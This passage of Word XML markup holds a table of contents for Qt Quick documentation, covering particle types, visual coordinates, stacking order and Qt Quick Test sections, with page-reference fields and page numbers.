            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick Particles Examples - System</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605413 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>187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14" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:noProof/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>Тыпы</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605414 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>191</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415" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:noProof/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>Attractor</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605415 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>192</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416" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:noProof/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>PointDirection</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605416 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>192</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417" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:noProof/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>RectangleShape</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605417 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>192</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418" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:noProof/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>Particle</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605418 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>193</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419" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:noProof/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>Wander</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605419 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>193</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420" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Important Concepts In Qt Quick - The Visual Canvas</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605420 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>193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21" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Coordinate System</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605421 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>193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22" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Visual Parent</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605422 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>193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23" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Scene Graph</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605423 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>193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24" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Concepts - Visual Coordinates in Qt Quick</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605424 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>193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25" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item Coordinates</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605425 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>194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26" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Scene Coordinates</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605426 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>194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27" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Worked Example</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605427 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>194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28" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Concepts - Visual Parent in Qt Quick</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605428 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>195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29" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Visual Parent</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605429 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>195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30" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item Coordinates</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605430 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>196</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31" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Stacking Order</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605431 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>196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32" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Canvas Ownership</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605432 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>199</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433" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick Test QML Types</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605433 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>199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34" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick Test Reference Documentation</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605434 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>200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35" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Introduction</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605435 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>200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36" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Running Tests</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605436 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>200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37" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Introduction to QML test cases</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605437 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>201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38" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Data-driven tests</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605438 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>202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39" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
